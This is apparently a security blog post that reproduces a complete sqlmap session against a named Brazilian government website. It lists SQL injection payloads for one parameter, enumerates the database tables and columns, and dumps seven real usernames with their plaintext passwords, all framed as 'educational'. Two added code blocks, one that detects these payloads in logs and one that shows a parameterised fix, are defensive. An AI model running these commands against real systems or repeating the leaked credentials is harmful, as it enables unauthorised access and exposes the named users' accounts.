Rui Barbosa Brazilian Government Site Compromised Via SQLi (sqlmap PoC Scan) | BOT24



As always, this information is for educational purposes. We show these compromised systems so that you understand the current threat environment that surrounds us every day and how significant it is to take the appropriate countermeasures to safeguard your critical data, no matter what size your organization is, as well as your individual data-driven devices. Below is a PoC of the exploit. Again, as always, be proactive, not reactive, in safeguarding your critical data, and stay safe out there. As you are aware, this blog is provided to the public to offer education in the area of IT security, creating awareness and increasing collaboration so you can implement the appropriate countermeasures, such as those described in ISO13335, to prevent yourselves from becoming victims in the current threat environment.

The breach is provided below, as I will continue to monitor the net to safeguard systems and individuals' critical data. Additionally, this information is provided to our readers as an addendum to the California Database Security Breach Act. Please do your part in helping to inform those who have been exploited, as you would want others to notify you if your critical data had been compromised. Karma!




 root@root:/pentest/web/scanners/sqlmap# python sqlmap.py -u http://casaruibarbosa.gov.br/interna.php?ID_S=9

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 00:27:34

[00:27:34] [INFO] using '/pentest/web/scanners/sqlmap/output/casaruibarbosa.gov.br/session' as session file
[00:27:34] [INFO] resuming injection data from session file
[00:27:34] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[00:27:34] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: ID_S
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ID_S=9 AND 9220=9220

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: ID_S=9 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,117,113,121,58),IFNULL(CAST(CHAR(78,69,88,112,83,69,113,114,117,84) AS CHAR),CHAR(32)),CHAR(58,99,104,97,58)), NULL, NULL, NULL, NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: ID_S=9 AND SLEEP(5)
---

[00:27:36] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: PHP 5.2.10, ASP.NET, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0.11
[00:27:36] [INFO] Fetched data logged to text files under '/pentest/web/scanners/sqlmap/output/casaruibarbosa.gov.br'

[*] shutting down at: 00:27:36
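
Added example, not part of the original post: a log check for the three payload classes sqlmap reports above for the ID_S parameter. The log layout and the sample lines are constructed; because ID_S is a numeric key, any non-integer value is flagged even when no signature matches.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed log lines (not from the affected server). Assumed layout:
# <client ip> <method> <URL-encoded request target> <status>
SAMPLE_LOG = """\
198.51.100.7 GET /interna.php?ID_S=9 200
203.0.113.5 GET /interna.php?ID_S=9%20AND%209220%3D9220 200
203.0.113.5 GET /interna.php?ID_S=9%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%23 200
203.0.113.5 GET /interna.php?ID_S=9+AND+SLEEP(5) 200
198.51.100.7 GET /interna.php?ID_S=12 200
"""

# One signature per technique named in the sqlmap report for ID_S.
SIGNATURES = [
    ("union-query", re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I)),
    ("time-based-blind", re.compile(r"\bsleep\s*\(", re.I)),
    ("boolean-based-blind", re.compile(r"\b(and|or)\b\s+\d+\s*=\s*\d+", re.I)),
]

def classify(value):
    """Return technique labels for one decoded ID_S value; [] means a plain integer."""
    if re.fullmatch(r"[0-9]+", value):
        return []
    hits = [name for name, rx in SIGNATURES if rx.search(value)]
    # Signatures can be evaded; the type check above is the reliable part.
    return hits or ["non-numeric"]

def scan(log_text, param="ID_S"):
    """Return (client_ip, labels, decoded_value) for every suspicious request."""
    findings = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # not in the assumed layout
        ip, _method, target, _status = parts
        query = urlsplit(target).query
        # parse_qs URL-decodes the value, so %20 and + both become spaces.
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            labels = classify(value)
            if labels:
                findings.append((ip, labels, value))
    return findings

if __name__ == "__main__":
    for ip, labels, value in scan(SAMPLE_LOG):
        print(ip, ",".join(labels), repr(value))
```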

root@root:/pentest/web/scanners/sqlmap# python sqlmap.py -u http://casaruibarbosa.gov.br/interna.php?ID_S=9 -D site_fcrb --tables

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 00:27:46

[00:27:47] [INFO] using '/pentest/web/scanners/sqlmap/output/casaruibarbosa.gov.br/session' as session file
[00:27:47] [INFO] resuming injection data from session file
[00:27:47] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[00:27:47] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: ID_S
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ID_S=9 AND 9220=9220

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: ID_S=9 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,117,113,121,58),IFNULL(CAST(CHAR(78,69,88,112,83,69,113,114,117,84) AS CHAR),CHAR(32)),CHAR(58,99,104,97,58)), NULL, NULL, NULL, NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: ID_S=9 AND SLEEP(5)
---

[00:27:48] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: PHP 5.2.10, ASP.NET, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0.11
[00:27:48] [INFO] fetching tables for database 'site_fcrb'
[00:27:48] [INFO] read from file '/pentest/web/scanners/sqlmap/output/casaruibarbosa.gov.br/session': site_fcrb, niveis, site_fcrb, nivel_0, site_fcrb, nivel_1, site_fcrb, nivel_2, site_fcrb, tb_campanhas, site_fcrb, tb_canal, site_fcrb, tb_canalsecao, site_fcrb, tb_links, site_fcrb, tb_materias, site_fcrb, tb_secoes, site_fcrb, tb_usuarios
Database: site_fcrb
[11 tables]
+---------------+
| niveis        |
| nivel_0       |
| nivel_1       |
| nivel_2       |
| tb_campanhas  |
| tb_canal      |
| tb_canalsecao |
| tb_links      |
| tb_materias   |
| tb_secoes     |
| tb_usuarios   |
+---------------+

[00:27:48] [INFO] Fetched data logged to text files under '/pentest/web/scanners/sqlmap/output/casaruibarbosa.gov.br'

[*] shutting down at: 00:27:48

root@root:/pentest/web/scanners/sqlmap# python sqlmap.py -u http://casaruibarbosa.gov.br/interna.php?ID_S=9 -D site_fcrb -T tb_usuarios --columns

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 00:27:55

[00:27:55] [INFO] using '/pentest/web/scanners/sqlmap/output/casaruibarbosa.gov.br/session' as session file
[00:27:55] [INFO] resuming injection data from session file
[00:27:55] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[00:27:55] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: ID_S
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ID_S=9 AND 9220=9220

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: ID_S=9 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,117,113,121,58),IFNULL(CAST(CHAR(78,69,88,112,83,69,113,114,117,84) AS CHAR),CHAR(32)),CHAR(58,99,104,97,58)), NULL, NULL, NULL, NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: ID_S=9 AND SLEEP(5)
---

[00:27:56] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: PHP 5.2.10, ASP.NET, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0.11
[00:27:56] [INFO] fetching columns for table 'tb_usuarios' on database 'site_fcrb'
[00:27:56] [INFO] read from file '/pentest/web/scanners/sqlmap/output/casaruibarbosa.gov.br/session': id_usuario, int(10) unsigned, id_login, varchar(10), nm_login, varchar(60), st_ativo, tinyint(3) unsigned, id_senha, varchar(12), id_grupo, tinyint(3) unsigned
Database: site_fcrb
Table: tb_usuarios
[6 columns]
+------------+---------------------+
| Column     | Type                |
+------------+---------------------+
| id_grupo   | tinyint(3) unsigned |
| id_login   | varchar(10)         |
| id_senha   | varchar(12)         |
| id_usuario | int(10) unsigned    |
| nm_login   | varchar(60)         |
| st_ativo   | tinyint(3) unsigned |
+------------+---------------------+

[00:27:56] [INFO] Fetched data logged to text files under '/pentest/web/scanners/sqlmap/output/casaruibarbosa.gov.br'

[*] shutting down at: 00:27:56

root@root:/pentest/web/scanners/sqlmap# python sqlmap.py -u http://casaruibarbosa.gov.br/interna.php?ID_S=9 -D site_fcrb -T tb_usuarios -C 'id_login,id_senha' --dump

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 00:28:51

[00:28:51] [INFO] using '/pentest/web/scanners/sqlmap/output/casaruibarbosa.gov.br/session' as session file
[00:28:51] [INFO] resuming injection data from session file
[00:28:51] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[00:28:51] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: ID_S
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ID_S=9 AND 9220=9220

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: ID_S=9 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,117,113,121,58),IFNULL(CAST(CHAR(78,69,88,112,83,69,113,114,117,84) AS CHAR),CHAR(32)),CHAR(58,99,104,97,58)), NULL, NULL, NULL, NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: ID_S=9 AND SLEEP(5)
---

[00:28:52] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: PHP 5.2.10, ASP.NET, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0.11
[00:28:52] [INFO] fetching columns 'id_login, id_senha' entries for table 'tb_usuarios' on database 'site_fcrb'
Database: site_fcrb
Table: tb_usuarios
[7 entries]
+------------+-------------+
| id_login   | id_senha    |
+------------+-------------+
| admin      | empreteco   |
| claudialts | fcrbclaudia |
| elizabeth  | 6937        |
| germeson   | andreia1212 |
| fcrb       | FCRB3289    |
| anapessoa  | 129702      |
| adrianasm  | dri123      |
+------------+-------------+

[00:28:53] [INFO] Table 'site_fcrb.tb_usuarios' dumped to CSV file '/pentest/web/scanners/sqlmap/output/casaruibarbosa.gov.br/dump/site_fcrb/tb_usuarios.csv'
[00:28:53] [INFO] Fetched data logged to text files under '/pentest/web/scanners/sqlmap/output/casaruibarbosa.gov.br'

[*] shutting down at: 00:28:53

root@root:/pentest/web/scanners/sqlmap#
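
Added example, not the site's code or part of the original post: a string-built query of the kind assumed to make ID_S injectable, beside a version that validates the integer and binds it as a parameter. An in-memory SQLite database and a hypothetical pages table stand in for the MySQL back end.

```python
import re
import sqlite3

def make_db():
    """In-memory SQLite stand-in for the back end (hypothetical schema and rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages (id_s INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO pages VALUES (?, ?)",
                   [(9, "Section nine"), (10, "Section ten")])
    return db

def lookup_vulnerable(db, raw_id):
    # 'Before': the request value is concatenated into the statement, so
    # everything after the leading digit is parsed as SQL.
    return db.execute("SELECT title FROM pages WHERE id_s = " + raw_id).fetchall()

def parse_id(raw_id):
    """Accept only 1-10 ASCII digits, the shape of an int(10) unsigned key."""
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        raise ValueError("ID_S must be an unsigned integer")
    return int(raw_id)

def lookup_hardened(db, raw_id):
    # 'After': validate the type first, then bind the value as a parameter
    # so it can never change the structure of the statement.
    return db.execute("SELECT title FROM pages WHERE id_s = ?",
                      (parse_id(raw_id),)).fetchall()

def is_rejected(db, raw_id):
    """True when the hardened lookup refuses the value outright."""
    try:
        lookup_hardened(db, raw_id)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    db = make_db()
    probe = "9 AND 9220=9220"  # boolean-based payload from the sqlmap report
    print("vulnerable:", lookup_vulnerable(db, probe))  # suffix ran as SQL
    print("hardened, clean id:", lookup_hardened(db, "9"))
    print("hardened rejects probe:", is_rejected(db, probe))
```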




//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Neither Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information.
